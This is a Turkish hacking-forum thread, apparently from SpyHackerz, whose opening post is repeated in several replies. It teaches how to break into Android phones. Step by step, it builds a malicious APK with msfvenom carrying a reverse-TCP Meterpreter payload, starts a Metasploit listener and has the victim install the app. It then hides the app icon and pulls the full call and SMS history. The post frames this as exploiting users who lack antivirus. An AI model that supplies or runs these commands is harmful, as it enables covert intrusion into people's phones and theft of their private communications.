Android hack /gr0und

Çoğu android kullanıcısı antivirüs kullanmıyor. Biz de bu açıktan yararlanarak telefonlara rahatlıkla sızabiliriz. *** Hidden text: You do not have sufficient rights to...

Çoğu android kullanıcısı antivirüs kullanmıyor. Biz de bu açıktan yararlanarak telefonlara rahatlıkla sızabiliriz.




View hidden content is available for registered users!


Anlatıma geçelim;

ilk önce ip adresinizi öğrenin. kendi bilgisayarınızda yapıyorsanız local ip adresinizi kullanacaksınız. sunucuda yapıyorsanız sunucunun ip adresini kullanın.
not:local ağda deneyecekseniz hedef cihazla bilgisayarınız aynı modeme bağlı olmalı

ifconfig



eğer tool sisteminizde yüklü değilse

curl https://raw.githubusercontent.com/r...s/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

komutunu girerek yükleyebilirsiniz

ardından apkyı oluşturuyoruz

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 R > /root/Desktop/android.apk

ip ve port kısımlarını kendinize göre düzenleyin. modemden belirtilen portu açın ve firewallden porta izin verin

masaüstünde apk dosyası oluşacak

ardından apache'yi başlatıyoruz

service apache2 start
View hidden content is available for registered users!


şimdi metasploiti açıyoruz

msfconsole



payloada geçiyoruz ve exploiti belirliyoruz


set payload android/meterpreter/reverse_tcp
use exploit/multi/handler

seçeneklere giriyoruz

show options

ip adresini ve portu ayarlıyoruz

set LHOST 192.168.1.34
set LPORT 4444

exploiti başlatıyoruz

exploit

şimdi oluşturduğunuz apkyı telefona yüklemelisiniz. telefona yüklediğiniz zaman komut satırı gelecek



şimdi telefon elimizde session numarasını alıp bağlanıyoruz shelle

sessions i

sessions –i 3



şimdi bağlantıyı kurduk neler yapabileceğimize bakıyoruz

help




hide_app_icon komutu ile uygulamayı gizleyerek başlayın

dump_calllog ile arama geçmişini tamamen çekebilirsiniz

dump_smslog ile sms geçmişini tamamen çekebilirsiniz

daha fazlası için orayı inceleyin

View hidden content is available for registered users!


 
Moderatörün son düzenlenenleri:
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Çoğu android kullanıcısı antivirüs kullanmıyor. Biz de bu açıktan yararlanarak telefonlara rahatlıkla sızabiliriz.




View hidden content is available for registered users!


Anlatıma geçelim;

ilk önce ip adresinizi öğrenin. kendi bilgisayarınızda yapıyorsanız local ip adresinizi kullanacaksınız. sunucuda yapıyorsanız sunucunun ip adresini kullanın.
not:local ağda deneyecekseniz hedef cihazla bilgisayarınız aynı modeme bağlı olmalı

ifconfig



eğer tool sisteminizde yüklü değilse

curl > msfinstall && chmod 755 msfinstall && ./msfinstall

komutunu girerek yükleyebilirsiniz

ardından apkyı oluşturuyoruz

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 R > /root/Desktop/android.apk

ip ve port kısımlarını kendinize göre düzenleyin. modemden belirtilen portu açın ve firewallden porta izin verin

masaüstünde apk dosyası oluşacak

ardından apache'yi başlatıyoruz

service apache2 start
View hidden content is available for registered users!


şimdi metasploiti açıyoruz

msfconsole



payloada geçiyoruz ve exploiti belirliyoruz


set payload android/meterpreter/reverse_tcp
use exploit/multi/handler

seçeneklere giriyoruz


show options

ip adresini ve portu ayarlıyoruz


set LHOST 192.168.1.34
set LPORT 4444

exploiti başlatıyoruz


exploit

şimdi oluşturduğunuz apkyı telefona yüklemelisiniz. telefona yüklediğiniz zaman komut satırı gelecek




şimdi telefon elimizde session numarasını alıp bağlanıyoruz shelle


sessions i
sessions –i 3



şimdi bağlantıyı kurduk neler yapabileceğimize bakıyoruz

help



hide_app_icon komutu ile uygulamayı gizleyerek başlayın


dump_calllog ile arama geçmişini tamamen çekebilirsiniz

dump_smslog ile sms geçmişini tamamen çekebilirsiniz


daha fazlası için orayı inceleyin

View hidden content is available for registered users!


teşekkürler
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Çoğu android kullanıcısı antivirüs kullanmıyor. Biz de bu açıktan yararlanarak telefonlara rahatlıkla sızabiliriz.




View hidden content is available for registered users!


Anlatıma geçelim;

ilk önce ip adresinizi öğrenin. kendi bilgisayarınızda yapıyorsanız local ip adresinizi kullanacaksınız. sunucuda yapıyorsanız sunucunun ip adresini kullanın.
not:local ağda deneyecekseniz hedef cihazla bilgisayarınız aynı modeme bağlı olmalı

ifconfig



eğer tool sisteminizde yüklü değilse

curl > msfinstall && chmod 755 msfinstall && ./msfinstall

komutunu girerek yükleyebilirsiniz

ardından apkyı oluşturuyoruz

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 R > /root/Desktop/android.apk

ip ve port kısımlarını kendinize göre düzenleyin. modemden belirtilen portu açın ve firewallden porta izin verin

masaüstünde apk dosyası oluşacak

ardından apache'yi başlatıyoruz

service apache2 start
View hidden content is available for registered users!


şimdi metasploiti açıyoruz

msfconsole



payloada geçiyoruz ve exploiti belirliyoruz


set payload android/meterpreter/reverse_tcp
use exploit/multi/handler

seçeneklere giriyoruz


show options

ip adresini ve portu ayarlıyoruz


set LHOST 192.168.1.34
set LPORT 4444

exploiti başlatıyoruz


exploit

şimdi oluşturduğunuz apkyı telefona yüklemelisiniz. telefona yüklediğiniz zaman komut satırı gelecek




şimdi telefon elimizde session numarasını alıp bağlanıyoruz shelle


sessions i
sessions –i 3



şimdi bağlantıyı kurduk neler yapabileceğimize bakıyoruz

help



hide_app_icon komutu ile uygulamayı gizleyerek başlayın


dump_calllog ile arama geçmişini tamamen çekebilirsiniz

dump_smslog ile sms geçmişini tamamen çekebilirsiniz


daha fazlası için orayı inceleyin

View hidden content is available for registered users!


.
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Çoğu android kullanıcısı antivirüs kullanmıyor. Biz de bu açıktan yararlanarak telefonlara rahatlıkla sızabiliriz.




View hidden content is available for registered users!


Anlatıma geçelim;

ilk önce ip adresinizi öğrenin. kendi bilgisayarınızda yapıyorsanız local ip adresinizi kullanacaksınız. sunucuda yapıyorsanız sunucunun ip adresini kullanın.
not:local ağda deneyecekseniz hedef cihazla bilgisayarınız aynı modeme bağlı olmalı

ifconfig



eğer tool sisteminizde yüklü değilse

curl > msfinstall && chmod 755 msfinstall && ./msfinstall

komutunu girerek yükleyebilirsiniz

ardından apkyı oluşturuyoruz

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 R > /root/Desktop/android.apk

ip ve port kısımlarını kendinize göre düzenleyin. modemden belirtilen portu açın ve firewallden porta izin verin

masaüstünde apk dosyası oluşacak

ardından apache'yi başlatıyoruz

service apache2 start
View hidden content is available for registered users!


şimdi metasploiti açıyoruz

msfconsole



payloada geçiyoruz ve exploiti belirliyoruz


set payload android/meterpreter/reverse_tcp
use exploit/multi/handler

seçeneklere giriyoruz


show options

ip adresini ve portu ayarlıyoruz


set LHOST 192.168.1.34
set LPORT 4444

exploiti başlatıyoruz


exploit

şimdi oluşturduğunuz apkyı telefona yüklemelisiniz. telefona yüklediğiniz zaman komut satırı gelecek




şimdi telefon elimizde session numarasını alıp bağlanıyoruz shelle


sessions i
sessions –i 3



şimdi bağlantıyı kurduk neler yapabileceğimize bakıyoruz

help



hide_app_icon komutu ile uygulamayı gizleyerek başlayın


dump_calllog ile arama geçmişini tamamen çekebilirsiniz

dump_smslog ile sms geçmişini tamamen çekebilirsiniz


daha fazlası için orayı inceleyin

View hidden content is available for registered users!


 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Güz
Çoğu android kullanıcısı antivirüs kullanmıyor. Biz de bu açıktan yararlanarak telefonlara rahatlıkla sızabiliriz.




View hidden content is available for registered users!


Anlatıma geçelim;

ilk önce ip adresinizi öğrenin. kendi bilgisayarınızda yapıyorsanız local ip adresinizi kullanacaksınız. sunucuda yapıyorsanız
Bakalım
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Çoğu android kullanıcısı antivirüs kullanmıyor. Biz de bu açıktan yararlanarak telefonlara rahatlıkla sızabiliriz.




View hidden content is available for registered users!


Anlatıma geçelim;

ilk önce ip adresinizi öğrenin. kendi bilgisayarınızda yapıyorsanız local ip adresinizi kullanacaksınız. sunucuda yapıyorsanız sunucunun ip adresini kullanın.
not:local ağda deneyecekseniz hedef cihazla bilgisayarınız aynı modeme bağlı olmalı

ifconfig



eğer tool sisteminizde yüklü değilse

curl > msfinstall && chmod 755 msfinstall && ./msfinstall

komutunu girerek yükleyebilirsiniz

ardından apkyı oluşturuyoruz

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 R > /root/Desktop/android.apk

ip ve port kısımlarını kendinize göre düzenleyin. modemden belirtilen portu açın ve firewallden porta izin verin

masaüstünde apk dosyası oluşacak

ardından apache'yi başlatıyoruz

service apache2 start
View hidden content is available for registered users!


şimdi metasploiti açıyoruz

msfconsole



payloada geçiyoruz ve exploiti belirliyoruz


set payload android/meterpreter/reverse_tcp
use exploit/multi/handler

seçeneklere giriyoruz


show options

ip adresini ve portu ayarlıyoruz


set LHOST 192.168.1.34
set LPORT 4444

exploiti başlatıyoruz


exploit

şimdi oluşturduğunuz apkyı telefona yüklemelisiniz. telefona yüklediğiniz zaman komut satırı gelecek




şimdi telefon elimizde session numarasını alıp bağlanıyoruz shelle


sessions i
sessions –i 3



şimdi bağlantıyı kurduk neler yapabileceğimize bakıyoruz

help



hide_app_icon komutu ile uygulamayı gizleyerek başlayın


dump_calllog ile arama geçmişini tamamen çekebilirsiniz

dump_smslog ile sms geçmişini tamamen çekebilirsiniz


daha fazlası için orayı inceleyin

View hidden content is available for registered users!


eyw
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
131,978Konular
3,273,479Mesajlar
316,687Kullanıcılar
phant0mSon Üye
Üst Alt